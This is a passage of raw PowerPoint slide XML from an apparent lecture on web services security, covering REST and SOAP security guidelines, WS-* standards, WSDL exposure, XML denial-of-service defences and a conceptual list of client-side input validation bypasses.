            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800"/>
              <a:t>Web Services allow multiple applications to interface remotely</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400"/>
              <a:t>Promotes interoperability</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800"/>
              <a:t>We will focus on two types:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400"/>
              <a:t>REST: REpresentational State Transfer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400"/>
              <a:t>SOAP: Simple Object Access Protocol</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800"/>
              <a:t>“Testing can be more challenging due to not having a ‘normal’ interface”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400"/>
              <a:t>Gunnar Peterson</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="28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EAB00736-EF9B-C7A7-1375-B1199411E7CD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>REST</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="368643" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{58AA5C2B-7862-C018-2A5C-9CA891C736CE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="70000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800"/>
              <a:t>Uses existing HTTP structure</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2800"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800"/>
              <a:t>Guidelines:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400"/>
              <a:t>Must use SSL to protect the messages</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400"/>
              <a:t>Use hashes to verify integrity</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2400"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800"/>
              <a:t>Advantages:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400"/>
              <a:t>No dependencies for security; uses built in infrastructure</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400"/>
              <a:t>Encryption is done at the network layer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{07DAAE57-3935-A169-64C0-B09A12A8585F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>User input attacks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="912387" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{05A14506-9A93-5463-C7B1-FE53DE6F6129}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>Bypassing client-side input restrictions and validation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>maxlength</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t> limits on an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>input</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t> text field</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>choices not listed in a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>select</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t> box</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>hidden </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>input</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t> fields</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>modifying or disabling client-side JavaScript validation code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CEE8F469-1029-7380-E1BC-4D0000C49240}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>SOAP</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="369667" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{08B0B392-55C2-3975-6FE1-A6F8437DCBA6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800"/>
              <a:t>SOAP security benefits from being heavily standardized when compared to other technologies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400"/>
              <a:t>Managed by Organization for the Advancement of Structured Information Standards (OASIS)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400"/>
              <a:t>Interoperability is a high priority</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800"/>
              <a:t>Security is managed by a “Handler Chain”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400"/>
              <a:t>Handlers are independent and can selectively apply “security”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400"/>
              <a:t>Order matters!  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000"/>
              <a:t>The server will execute each Handler in reverse order from the client.  Incorrect execution order can lead to garbage data!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2000"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="28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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F8825AAE-5C5C-958D-949B-3A90B0B6FCBD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>SOAP - Continued</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="755715" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3AD7EB4D-2C68-FF9E-7BF0-771EE0147B8E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800"/>
              <a:t>Provides end-to-end security at the Application Layer or the Network Layer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400"/>
              <a:t>Message contents can be selectively encrypted or the entire message can be encrypted by SSL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="240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A2F8796F-F75C-809B-ACF5-04BE3714BD0C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>SOAP Security Recommendations</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="468995" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1530AA31-635D-97C7-5280-07FD6227C6DC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="10000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>Always validate input (yes, again)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="10000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>Input from a web service call is just as susceptible to malicious input</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="10000"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="10000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="10000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="10000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>From </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Security Concepts, Challenges, and Design Considerations for Web Services Integration</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="10000"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US"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62" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0EF689BA-7FC7-FF18-8791-B7F4101288FC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>SOAP Security Recommendations - Continued</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="757763" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AED62D4E-AB3C-1F44-2614-CC893A205137}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="10000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800"/>
              <a:t>Secure your Web Service Definition Language WSDL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="10000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400"/>
              <a:t>Your WSDL leaks the interface to your web services</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="10000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800"/>
              <a:t>Use proper access controls methods</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="10000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800"/>
              <a:t>Defend against XDoS (XML Denial-of-service)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="10000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400"/>
              <a:t>DO NOT use Document Type Definition DTDs* – vulnerable to infinite recursion, use XML schemas instead</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="10000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400"/>
              <a:t>Throttle incoming messages</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="10000"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="10000"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="10000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>From </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Security Concepts, Challenges, and Design Considerations for Web Services Integration</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="10000"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="240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8569379E-22F2-5093-F1C9-8EA67A2C49D8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>SOAP Standards: WS-* (Web Services-*)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="530435" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DA50BCB6-72E6-43E6-8C3C-C111932E83C4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="62500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>WS-Security</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800"/>
              <a:t>Includes authentication, Kerberos, X.509, SAML, Attachment mechanisms among others</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>XML encryption and digital signatures</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800"/>
              <a:t>Protects the privacy and integrity of your messages respectively</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>WS-SecureConversation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800"/>
              <a:t>Provides a “session” to the stateless SOAP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>WS-Policy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800"/>
              <a:t>set of specifications that describe the capabilities and constraints of the security policies on intermediaries and end points and how to associate policies with services and end points </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>WS-Reliability</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800"/>
              <a:t>a protocol that allows SOAP messages to be delivered reliably between distributed applications in the presence of software component, system, or network failures </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400"/>
              <a:t>                                                   Many more…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"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0FB72C96-5A2E-7F00-7BF6-1E0716911CBD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>AJAX Request Lifecycle</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Content Placeholder 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5929546A-75B0-5408-A001-258B2C573AD3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="363524" name="laptop">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{61AA356F-966B-391E-E9DB-14C9F5D654A0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noEditPoints="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1905000" y="3048001"/>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63525" name="tower">
            <a:extLst>
